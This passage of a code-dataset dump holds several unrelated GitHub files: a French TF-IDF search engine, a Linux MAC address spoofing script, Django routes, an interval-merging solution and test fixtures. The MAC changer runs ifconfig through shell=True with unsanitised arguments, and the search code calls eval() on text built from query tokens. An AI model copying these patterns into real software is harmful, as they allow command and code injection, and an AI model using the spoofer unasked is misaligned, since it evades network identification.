nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import word_tokenize\r\nimport os,sys,re,copy,time\r\nimport operator\r\nimport pickle\r\nfrom math import *\r\nimport numpy\r\nimport codecs\r\n\r\n\r\nposition = os.path.dirname(os.path.abspath(__file__))\r\nbaseFilePath=\"C:\\\\Users\\\\PC\\\\Desktop\\\\TPRI\\\\ProjetRI\\\\cacm\\\\\"\r\ntableFrequences = {}\r\ntableFichierInverse = {}\r\ntableFrequencesPondere={}\r\ntableInversePondere = {}\r\nmaxFreqTable = {}\r\nstopWordsIndex = {}\r\nmatriceAppariment=None\r\ntempsDeConstruction={}\r\ntempsExecution={}\r\n\r\ndef ExtraireInformations(NomF):\r\n TabContenuDocs = nltk.defaultdict(str)\r\n fichier = open(NomF, 'r')\r\n Lignes = fichier.readlines()\r\n i = 0\r\n NumDoc = 0\r\n\r\n while(i < len(Lignes)):\r\n Ligne = Lignes[i]\r\n if Ligne.startswith('.I'):\r\n NumDoc = int(Ligne.split()[1])\r\n\r\n if Ligne.startswith('.T'):\r\n i += 1\r\n contenuDoc = \"\"\r\n while(((nltk.re.findall('\\.([TWBANX]\\n|I [0-9]+\\n)', Lignes[i]) == [])) and (i < len(Lignes))):\r\n mots = Lignes[i].split() # word_tokenize(Lignes[i])\r\n for mot in mots:\r\n if len(mot) > 1 and 
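# A hypothetical driver for the connect()/list_connections()/disconnect() API defined
# in the gefyra record above, assuming the module is importable as gefyra.api.connect;
# the connection name and the client-config path are invented for illustration.
from gefyra.api.connect import connect, disconnect, list_connections

with open("client-a.json") as client_config:  # JSON written for a GefyraClient
    connect("my-cluster", client_config, probe_timeout=30)

for item in list_connections():  # GefyraConnectionItem carries name/version/created/status
    print(item.name, item.status)

disconnect("my-cluster")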
acess(mot) is None:\r\n contenuDoc = contenuDoc+\" \"+mot.lower()\r\n\r\n i += 1\r\n #contenuDoc = contenuDoc[1:]\r\n TabContenuDocs[NumDoc] = contenuDoc\r\n i -= 1\r\n\r\n if Ligne.startswith('.W'):\r\n i += 1\r\n contenuDoc = \"\"\r\n while(((nltk.re.findall('\\.([TWBANX]\\n|I [0-9]+\\n)', Lignes[i]) == [])) and (i < len(Lignes))):\r\n mots = Lignes[i].split() # word_tokenize(Lignes[i])\r\n for mot in mots:\r\n if len(mot) > 1 and acess(mot) == None:\r\n contenuDoc = contenuDoc+\" \"+mot.lower()\r\n\r\n\r\n i += 1\r\n #contenuDoc = contenuDoc[1:]\r\n TabContenuDocs[NumDoc] = TabContenuDocs[NumDoc]+contenuDoc\r\n\r\n i -= 1\r\n\r\n i += 1\r\n \r\n return TabContenuDocs\r\n\r\n\r\ndef construireTableFreq(nomF):\r\n debut=time.time()\r\n tableContenu = ExtraireInformations(nomF)\r\n global tableFrequences\r\n global tempsDeConstruction\r\n for doc, listeMots in tableContenu.items():\r\n frequences = {}\r\n tab = nltk.tokenize.word_tokenize(listeMots)\r\n tab=[el for el in tab if el not in '[ ( ) ! \\ ? . ; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') ]\r\n tab=[re.sub(\"[\\\"'\\.,:\\)\\(\\?!<>-]+$\",\"\",el) for el in tab]\r\n tab=[re.sub(\"^[\\\"'\\.,:\\)\\(\\?!<>-]+\",\"\",el) for el in tab]\r\n for mot in tab:\r\n if len(mot)>1 and not acess(mot):\r\n if not mot in frequences:\r\n frequences[mot] = 0\r\n frequences[mot] += 1\r\n\r\n tableFrequences[int(doc)] = frequences\r\n fin=time.time()\r\n tempsDeConstruction[\"TableFreq\"]=fin-debut\r\n sauvegarder_obj(tableFrequences,\"tableFrequences\")\r\n sauvegarder_json(tableFrequences,\"tableFrequences\")\r\n \r\n print(\"Temps de la constructionde l'index des fréquences : \",(fin-debut),\" seconds.\")\r\n\r\n return tableFrequences \r\n\r\n\r\ndef construireFichierInverse():\r\n global tableFichierInverse\r\n global tableFrequences\r\n global baseFilePath\r\n global tempsDeConstruction\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"ConstruireFichierInverse : table fréquence non trouvée sur disque. Reconstruction . . .\")\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\") \r\n \r\n for doc in tableFrequences:\r\n for mot, freq in tableFrequences[doc].items():\r\n if not mot.lower() in tableFichierInverse:\r\n tableFichierInverse[mot.lower()] = []\r\n tableFichierInverse[mot.lower()].append([doc, freq])\r\n fin=time.time()\r\n tempsDeConstruction[\"FichierInverse\"]=fin-debut\r\n sauvegarder_obj(tableFichierInverse,\"fichierInverse\")\r\n sauvegarder_json(tableFichierInverse,\"fichierInverse\")\r\n print(\"Temps de la constructionde du Ficher inverse : \",(fin-debut),\" seconds.\")\r\n return tableFichierInverse \r\n\r\n\r\ndef getFrequences(doc):\r\n global tableFrequences\r\n doc=str(doc)\r\n doc=doc.lower()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"GetFrequences : table fichier inversé non trouvée sur disque. Reconstruction . . 
.\")\r\n tableFrequences=construireTableFreq()\r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")\r\n\r\n if type(next(iter(tableFrequences)))==type(2):\r\n doc=int(doc)\r\n if doc not in tableFrequences:\r\n print(\"None value\")\r\n return None\r\n \r\n frequences = {}\r\n \r\n for term,freq in tableFrequences[doc].items():\r\n frequences[term] = freq\r\n\r\n return frequences\r\n\r\n\r\ndef getOccurences(term):\r\n\r\n if term not in tableFichierInverse:\r\n return None\r\n occurences = {}\r\n for occurence in tableFichierInverse[term]:\r\n occurences[occurence[0]] = occurence[1]\r\n\r\n return occurences\r\n\r\n\r\ndef getMaxFrequence(doc):\r\n global tableFrequences\r\n max = 0\r\n for term, freq in tableFrequences[doc].items():\r\n if freq > max:\r\n max = freq\r\n\r\n return max\r\n\r\ndef calculerTousMaxes(maxesDict):\r\n global tableFrequences\r\n \r\n for doc in tableFrequences.keys():\r\n maxesDict[int(doc)]=getMaxFrequence(doc)\r\n\r\n return maxesDict \r\n\r\n\r\ndef calculerNi(term):\r\n global tableFichierInverse\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n print(\"Calcul Ni : table fichier inversé non trouvée sur disque. Reconstruction . . .\")\r\n tableFichierInverse=construireFichierInverse()\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse=charger_obj(\"fichierInverse\")\r\n ni = 0\r\n \r\n for liste in tableFichierInverse[term.lower()]:\r\n ni += liste[1]\r\n\r\n return ni\r\n\r\n\r\ndef construireTableFrequencesPondere():\r\n global tableFrequences\r\n global tableFrequencesPondere\r\n global tempsDeConstruction\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n print(\"ConstruireTFreqPondéré : table fréquence non trouvée sur disque. Reconstruction . . .\")\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")\r\n \r\n debut=time.time()\r\n tableFrequencesPondere = tableFrequences.copy()\r\n maxes = {}\r\n N=len(tableFrequencesPondere)\r\n for doc,frequences in tableFrequencesPondere.items():\r\n maxes[doc] = getMaxFrequence(doc)\r\n for term,freq in frequences.items():\r\n \r\n ni = calculerNi(term)\r\n \r\n\r\n tableFrequencesPondere[doc][term] = float(\r\n (freq/maxes[doc]) * numpy.log10((float(N)/ni)+1))\r\n fin=time.time()\r\n tempsDeConstruction[\"IndexPondere\"]=fin-debut \r\n sauvegarder_json(tableFrequencesPondere,\"tableFrequencesPondere\")\r\n sauvegarder_obj(tableFrequencesPondere,\"tableFrequencesPondere\")\r\n \r\n print(\"Temps de la constructionde de l'index pondéré : \",(fin-debut),\" seconds.\")\r\n return tableFrequencesPondere\r\n\r\ndef construireFichierInversePondere():\r\n global tableFichierInverse\r\n global tableFrequences\r\n global tableInversePondere\r\n global tempsDeConstruction\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n print(\"ConstruireFIPondéré : table fichier inversé non trouvée sur disque. Reconstruction . . 
.\")\r\n tableFichierInverse=construireFichierInverse()\r\n\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse=charger_obj(\"fichierInverse\")\r\n\r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\") \r\n\r\n \r\n tableInversePondere = copy.deepcopy(tableFichierInverse)\r\n maxes = {}\r\n maxes=calculerTousMaxes(maxes)\r\n \r\n N=len(tableFrequences)\r\n for term, listeOccurences in tableFichierInverse.items():\r\n i=0\r\n listeNi={} # si un terme apparait K fois avec la même fréquence, pas la peinde de la recalculer\r\n for liste in listeOccurences:\r\n \r\n doc = liste[0]\r\n if not liste[1] in listeNi:\r\n ni = calculerNi(term)\r\n listeNi[liste[1]]=ni \r\n else:\r\n ni=listeNi[liste[1]]\r\n\r\n tableInversePondere[term][i][1] = float(\r\n (liste[1]/maxes[doc]) * numpy.log10((float(N)/ni)+1))\r\n i+=1 \r\n fin=time.time()\r\n tempsDeConstruction[\"fichierInversePondere\"]=fin-debut\r\n sauvegarder_json(tableInversePondere,\"fichierInversePondere\")\r\n sauvegarder_obj(tableInversePondere,\"fichierInversePondere\")\r\n print(\"Temps de la constructionde du Ficher inverse pondéré: \",(fin-debut),\" seconds.\")\r\n return tableInversePondere\r\n\r\n\r\ndef construireIndexMotsVides():\r\n global stopWordsIndex\r\n global tempsDeConstruction\r\n debut=time.time()\r\n listMotsVides = stopwords.words('english') # text.split('\\n')\r\n for ligne in listMotsVides:\r\n if str(ligne.lower()[0]) not in stopWordsIndex:\r\n stopWordsIndex[str(ligne.lower()[0])] = []\r\n\r\n stopWordsIndex[str(ligne.lower()[0])].append(ligne)\r\n fin=time.time()\r\n tempsDeConstruction[\"indexStopWords\"]=fin-debut\r\n # fichierMotsVides.close()\r\n\r\n return stopWordsIndex\r\n\r\ndef acess(motVide):\r\n global stopWordsIndex\r\n if not bool(stopWordsIndex):\r\n stopWordsIndex=construireIndexMotsVides()\r\n if not str(motVide.lower()[0]) in stopWordsIndex:\r\n return None\r\n for element in stopWordsIndex[str(motVide.lower()[0])]:\r\n if element.lower() == motVide.lower():\r\n return True\r\n return None\r\n\r\ndef sauvegarderTableFrequences():\r\n global tableFrequences\r\n # print(tableFrequences)\r\n buffer = \"\"\r\n for doc in tableFrequences.keys():\r\n ligne = \"\"+str(doc)+\"--> {\"\r\n for term, freq in tableFrequences[doc].items():\r\n ligne += \"<\"+term+\", \"+str(freq)+\">,\"\r\n\r\n ligne = ligne[:len(ligne)-1]\r\n ligne += \"}\"\r\n # print(ligne)\r\n buffer += ligne+\"\\n\"\r\n\r\n f = open(os.path.join(position, \"objets/tableFrequences.txt\"), \"w\")\r\n f.write(buffer)\r\n f.close()\r\n\r\n\r\n\r\n\r\ndef sauvegarder_obj(obj, name):\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.pkl', 'wb') as f:\r\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\ndef charger_obj(name):\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef sauvegarder_json(dictionary, name):\r\n import json\r\n with open(os.path.join(position+\"\\\\objets\", name) + '.txt', 'w') as f:\r\n f.write(json.dumps(dictionary))\r\n\r\n\r\ndef charger_json(name):\r\n import json\r\n return json.loads(open(os.path.join(position+\"\\\\objets\", name)+'.txt', 'r').read())\r\n\r\n\r\ndef Recherche_modelBooleen(Requete):\r\n global tableFrequences\r\n global tableFichierInverse\r\n if not bool(tableFrequences):\r\n tableFrequences = charger_obj(\"tableFrequences\")\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse = charger_obj(\"fichierInverse\")\r\n\r\n docsPertinants = []\r\n ReqTokens = 
re.split(r'([ \\(\\)])', Requete.lower())\r\n ReqTokens = [el for el in ReqTokens if not re.match(\r\n r'\\s+', el) and el != '']\r\n \r\n ReqTerms = []\r\n for token in ReqTokens:\r\n if token not in ['(', ')', 'not', 'or', 'and']:\r\n ReqTerms.append(token)\r\n\r\n matriceAppariment = numpy.empty(\r\n shape=(len(tableFrequences)+1, len(ReqTerms)), dtype=str)\r\n for key in tableFichierInverse.keys():\r\n if recherche(key, ReqTerms) >= 0:\r\n liste = tableFichierInverse[key]\r\n for el in liste:\r\n matriceAppariment[el[0]][recherche(key, ReqTerms)] = \"1\"\r\n\r\n for i in range(1, len(tableFrequences)):\r\n docEtTerm = ReqTokens.copy()\r\n for j in range(len(ReqTokens)):\r\n if ReqTokens[j] in ['(', ')', 'not', 'or', 'and']:\r\n docEtTerm[j] = ReqTokens[j]\r\n else:\r\n docEtTerm[j] = \"1\" if matriceAppariment[i,ReqTerms.index(ReqTokens[j])] == \"1\"else \"0\" \r\n try:\r\n if(eval(' '.join(docEtTerm)) == 1):\r\n docsPertinants.append(i)\r\n\r\n except Exception:\r\n return -1\r\n\r\n\r\n return docsPertinants\r\n\r\n\r\ndef Recherche_ModelVectoriel(tableInversePoids, requete, methode,seuil):\r\n global tableFrequences\r\n global tableInversePondere\r\n global tableFrequencesPondere\r\n global matriceAppariment\r\n if os.path.exists('RSV_'+methode+'.txt'):\r\n resultat=charger_json(\"RSV_\"+methode)\r\n if resultat[\"Requete\"]==requete:\r\n return resultat[\"Resultat\"]\r\n\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n if not bool(tableFrequences):\r\n tableFrequences = charger_obj(\"tableFrequences\")\r\n\r\n if not os.path.exists('objets\\\\fichierInversePondere.txt'):\r\n \r\n tableInversePondere=construireFichierInversePondere()\r\n\r\n if not bool(tableInversePondere):\r\n tableInversePondere = charger_obj(\"fichierInversePondere\")\r\n\r\n if not os.path.exists('objets\\\\tableFrequencesPondere.txt'):\r\n tableFrequencesPondere=construireTableFrequencesPondere()\r\n\r\n if not bool(tableFrequencesPondere):\r\n tableFrequencesPondere = charger_obj(\"tableFrequencesPondere\") \r\n\r\n \r\n \r\n ensembleTermes = [term for term in list(tableInversePondere)]\r\n \r\n # if matriceAppariment is None:\r\n # if not os.path.exists('objets\\\\matriceCollection.pkl'):\r\n # matriceAppariment = numpy.empty(shape=(len(tableFrequences)+1, len(tableInversePondere)), dtype=int)\r\n\r\n # for doc in tableFrequences.keys():\r\n \r\n # for i in range(len(ensembleTermes)):\r\n # if(ensembleTermes[i] in tableFrequences[doc]):\r\n # matriceAppariment[int(doc),i] = tableFrequences[doc][ensembleTermes[i]]\r\n # else:\r\n # matriceAppariment[int(doc), i] = 0\r\n\r\n\r\n # sauvegarder_obj(matriceAppariment,\"matriceCollection\") \r\n\r\n # else:\r\n # matriceAppariment=charger_obj(\"matriceCollection\") \r\n \r\n\r\n Requete = [term for term in nltk.tokenize.word_tokenize(requete) if not acess(term) and not term in '[ ( ) ! \\ ? . 
; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') ]\r\n vecteurRequete = numpy.empty(len(tableInversePondere.keys()), dtype=int)\r\n \r\n for i in range(len(vecteurRequete)):\r\n vecteurRequete[i] = 1 if recherche(\r\n ensembleTermes[i], Requete) >= 0 else 0\r\n tableRSV={}\r\n for doc in range(1, len(tableFrequences)):\r\n sommex=0.0\r\n sommexy=0.0\r\n sommey=0.0\r\n # Effectuer les calculs\r\n if(methode.lower() == \"Inner Product\".lower()):\r\n for indice in range(len(Requete)):\r\n sommexy = sommexy+float((tableFrequencesPondere[doc][Requete[indice]] if Requete[indice] in tableFrequencesPondere[doc] else 0))\r\n if sommexy>seuil:\r\n tableRSV[doc]=sommexy\r\n\r\n if(methode.lower() == \"Coef. de Dice\".lower()):\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n if(sommex+sommey) != 0:\r\n rsv = (2*sommexy)/(sommex+sommey)\r\n else :\r\n rsv=0 \r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n if(methode.lower() == \"Mesure de Cosinus\".lower()):\r\n # somme des x^2, y^2, x*y\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n\r\n if(sqrt(sommex*sommey) != 0):\r\n rsv = sommexy/sqrt(sommex*sommey)\r\n else :\r\n rsv=0\r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n if(methode.lower() == \"Mesure de Jacard\".lower()):\r\n # somme des x^2; y^2 et x*y\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n # mesure pour le doc i\r\n if((sommex+sommey-sommexy) != 0):\r\n rsv = sommexy/(sommex+sommey-sommexy)\r\n else :\r\n rsv=0 \r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n tableRSV=dict(sorted(tableRSV.items(),key=operator.itemgetter(1),reverse=True))\r\n fin=time.time()\r\n print(\"Temps d'execution :\"+str(fin-debut)+\" seconds.\")\r\n tempsExecution[\"temps_modeleVectoriel\"]=fin-debut\r\n result={}\r\n result[\"Requete\"]=requete\r\n result['Resultat']=tableRSV\r\n sauvegarder_json(result,\"RSV_\"+methode)\r\n return tableRSV \r\n\r\ndef chargerRequetes(nomF):\r\n global stopWordsIndex\r\n\r\n stopWordsIndex=construireIndexMotsVides()\r\n\r\n tabContenu=ExtraireInformations(nomF)\r\n\r\n dictionnaireRequetes=nltk.defaultdict(list)\r\n\r\n for doc,contenu in tabContenu.items():\r\n listeTokens = set()\r\n tab = nltk.tokenize.word_tokenize(contenu)\r\n for mot in tab:\r\n if not mot in '[ ( ) ! \\ ? . 
; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') and not acess(mot):\r\n listeTokens.add(mot)\r\n\r\n dictionnaireRequetes[int(doc)] = list(listeTokens)\r\n\r\n return dictionnaireRequetes \r\n\r\n\r\ndef chargerResultatsRequetes(nomF):\r\n f=open(nomF,'r')\r\n text=f.readlines()\r\n Resultat=nltk.defaultdict(list)\r\n for line in text:\r\n Tab=line.split() \r\n Resultat[int(Tab[0])].append(int(Tab[1]))\r\n return Resultat\r\n\r\n\r\ndef evaluerModelVectoriel(resultats,numRequete,methode):\r\n \r\n \r\n resultatAttendus=chargerResultatsRequetes(baseFilePath+\"qrels.text\")[numRequete]\r\n #print(\"Expected : \"+str(resultatAttendus))\r\n\r\n #print(\"returned : \"+str(resultats))\r\n intersect=list(set(resultats) & set(resultatAttendus))\r\n rappel=len(intersect)/len(resultatAttendus) if len(resultatAttendus)!=0 else 0\r\n\r\n precision=len(intersect)/len(resultats) if len(resultats)!=0 else 0\r\n return [rappel,precision]\r\n\r\n\r\ndef recherche(term, liste):\r\n for i in range(len(liste)):\r\n if liste[i].lower() == term.lower():\r\n return i\r\n\r\n return -1\r\n\r\ndef getTableFrequences():\r\n global tableFrequences\r\n global baseFilePath\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")#charger_json(\"tableFrequences\")\r\n\r\n return tableFrequences \r\n\r\ndef getTableFichierInverse():\r\n global tableFichierInverse\r\n\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n tableFichierInverse=construireFichierInverse()\r\n\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse = charger_obj(\"fichierInverse\")\r\n\r\n return tableFichierInverse \r\n \r\n \r\n\r\n\r\n# ***************************************************************************************************************\r\n\r\n\r\n\r\ndef evaluation(vectResult, docsUser):\r\n docsSys = []\r\n docsPerti = []\r\n for element in vectResult:\r\n if (element != 0.0):\r\n docsSys.append(element[0])\r\n for element in docsSys:\r\n if element in docsUser:\r\n docsPerti.append(element)\r\n # calcul du rappel et de la precision\r\n nbDocsSys = len(docsSys)\r\n nbDocsUser = len(docsUser)\r\n nbDocsPerti = len(docsPerti)\r\n print(nbDocsSys, nbDocsUser, nbDocsPerti)\r\n # nb docs pertinants de sys / nb docs pertinants de user\r\n rappel = nbDocsPerti/nbDocsUser\r\n # nb docs pertinants de sys / nb total docs retournés par sys\r\n précision = nbDocsPerti/nbDocsSys\r\n\r\n result = []\r\n result.append(rappel)\r\n result.append(précision)\r\n\r\n return result\r\n\r\n\r\n","repo_name":"goldenfay/information-retreival-app","sub_path":"searchModel.py","file_name":"searchModel.py","file_ext":"py","file_size_in_byte":21874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31778790350","text":"import subprocess\nimport string\nimport random\nimport re\n\n\nclass bcolors:\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n RED = '\\033[31m'\n YELLOW = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n BGRED = '\\033[41m'\n WHITE = '\\033[37m'\n\n\nprint(\"\"\"\n\n __ __ _ ____ \n | \\/ | / \\ / ___| \n | |\\/| | / _ \\| | \n | | | |/ ___ \\ |___ \n |_| |_/_/ \\_\\____| \n ____ _ \n / ___| |__ __ _ _ __ __ _ ___ _ __ \n | | | '_ \\ / _` | '_ \\ / _` |/ _ \\ '__|\n | |___| | | | (_| | | | | (_| | __/ | \n \\____|_| |_|\\__,_|_| |_|\\__, |\\___|_| \n |___/ \n\n\nMAC Changer v1.0\nCoded by 
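# A worked example of the weighting used by construireTableFrequencesPondere in the
# record above: w = (freq / max_freq) * log10(N / ni + 1). The numbers are invented;
# N = 3204 matches the size of the CACM collection the script targets.
from math import log10

N = 3204       # documents in the collection
ni = 42        # total occurrences of the term across the collection (calculerNi)
freq = 3       # occurrences of the term in this document
max_freq = 7   # highest term frequency in this document (getMaxFrequence)

w = (freq / max_freq) * log10((N / ni) + 1)
print(round(w, 4))  # ~0.8092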
Namiq Mamedov\nmamedov_namiq02@mail.ru\n\n\"\"\")\n\n\ndef get_random_mac_address():\n uppercased_hexdigits = ''.join(set(string.hexdigits.upper()))\n\n mac = \"\"\n for i in range(6):\n for j in range(2):\n if i == 0:\n mac += random.choice(\"02468ACE\")\n else:\n mac += random.choice(uppercased_hexdigits)\n mac += \":\"\n return mac.strip(\":\")\n\n\ndef get_current_mac_address(iface):\n output = subprocess.check_output(f\"ifconfig {iface}\", shell=True).decode()\n\n return re.search(\"ether (.+)\", output).group().split()[1].strip()\n\n\ndef change_mac_address(iface, new_mac_address):\n subprocess.check_output(f\"ifconfig {iface} down\", shell=True)\n\n subprocess.check_output(f\"ifconfig {iface} hw ether {new_mac_address}\", shell=True)\n\n subprocess.check_output(f\"ifconfig {iface} up\", shell=True)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Python Mac Changer on Linux\")\n parser.add_argument(\"interface\", help=\"The network interface name on Linux\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Whether to generate a random MAC address\")\n parser.add_argument(\"-m\", \"--mac\", help=\"The new MAC you want to change to\")\n args = parser.parse_args()\n iface = args.interface\n if args.random:\n new_mac_address = get_random_mac_address()\n elif args.mac:\n new_mac_address = args.mac\n else:\n parser.error(\"either -r/--random or -m/--mac is required\")\n\n old_mac_address = get_current_mac_address(iface)\n print(\"[*] Old MAC address:\", old_mac_address)\n\n change_mac_address(iface, new_mac_address)\n\n new_mac_address = get_current_mac_address(iface)\n print(\"[+] New MAC address:\", new_mac_address)\n\n\n\n","repo_name":"namiqmamedovv/mac_changer","sub_path":"macchanger.py","file_name":"macchanger.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27928544833","text":"from django.urls import path\n\nfrom . 
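# A small sanity check for get_random_mac_address() from the record above, assuming the
# function is in scope; it verifies the XX:XX:XX:XX:XX:XX shape and that the first octet
# is even, i.e. the multicast bit is clear.
import re

mac = get_random_mac_address()
assert re.fullmatch(r"([0-9A-F]{2}:){5}[0-9A-F]{2}", mac)
assert int(mac[:2], 16) % 2 == 0  # unicast address
print(mac)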
import views\n\napp_name = 'aquastore_app'\n\nurlpatterns = [\n path(r'', views.lista_aguas, name='lista_aguas'),\n path(r'cat//', views.lista_aguas, name='lista_aguas_por_categoria'),\n path(r'produto/()', views.exibe_agua, name='exibe_agua'),\n path(r'sobre.html', views.sobre, name='sobre'),\n path(r'cadastro.html', views.novo, name='cadastro'),\n path(r'admin.html', views.admin, name='admin'),\n path(r'/update', views.atualiza, name='atualiza'),\n path(r'/delete', views.deleta, name='deleta'),\n path(r'register.html', views.register, name='register'),\n path(r'logout', views.logout_user, name='logout_user'),\n]\n\n","repo_name":"lclopes/Aqua-Store-Django","sub_path":"aquastore_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878282456","text":"\"\"\"\nGiven an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals, and return an array of the non-overlapping intervals that cover all the intervals in the input.\n\n\n\nExample 1:\n\nInput: intervals = [[1,3],[2,6],[8,10],[15,18]]\nOutput: [[1,6],[8,10],[15,18]]\nExplanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].\n\nExample 2:\n\nInput: intervals = [[1,4],[4,5]]\nOutput: [[1,5]]\nExplanation: Intervals [1,4] and [4,5] are considered overlapping.\n\n\nConstraints:\n\n1 <= intervals.length <= 10^4\nintervals[i].length == 2\n0 <= starti <= endi <= 10^4\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n result = []\n if not intervals:\n return result\n ordered = sorted(intervals, key=lambda a: a[0])\n pre = [ordered[0][0], ordered[0][1]]\n result.append(pre)\n for i in range(1, len(ordered)):\n if pre[1] >= ordered[i][0]:\n pre[1] = max(pre[1], ordered[i][1])\n else:\n pre = [ordered[i][0], ordered[i][1]]\n result.append(pre)\n return result\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"86200179","text":"import os\n\nimport pytest\nimport yatest.common\n\npytest_plugins = [\n \"crypta.utils.rtmr_resource_service.bin.server.testutils.fixtures\",\n]\n\n\n@pytest.fixture\ndef file_root(request):\n yield getattr(request.module, \"FILE_ROOT\", yatest.common.test_source_path(\"data/resource_service/resources\"))\n\n\n@pytest.fixture\ndef resources(file_root):\n yield {name: {\"resource_type\": name} for name in os.listdir(file_root)}\n\n\n@pytest.fixture\ndef cluster_envs():\n yield {\n \"rtmr-vla\": \"stable\",\n }\n\n\n@pytest.fixture\ndef public_resources(file_root, resources):\n yield {\n (resource, \"stable\", int(version))\n for resource in resources\n for version in os.listdir(os.path.join(file_root, resource))\n }\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test_framework/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15169170059","text":"P = float(input())\r\n\r\ndef f(p):\r\n return p + P*2**(-p/1.5)\r\n\r\nEPSILON = 10**(-9)\r\nlo = 0\r\nhi = P\r\nwhile hi-lo >= 10**(-8):\r\n m = (hi + lo) /2\r\n fm = f(m)\r\n fme = f(m+EPSILON)\r\n if fm > fme:\r\n lo = m\r\n else:\r\n hi = 
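# A quick check of Solution1.merge from the record above, assuming the class is in
# scope; the inputs mirror the two examples in its docstring.
print(Solution1().merge([[1, 3], [2, 6], [8, 10], [15, 18]]))  # [[1, 6], [8, 10], [15, 18]]
print(Solution1().merge([[1, 4], [4, 5]]))                     # [[1, 5]]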
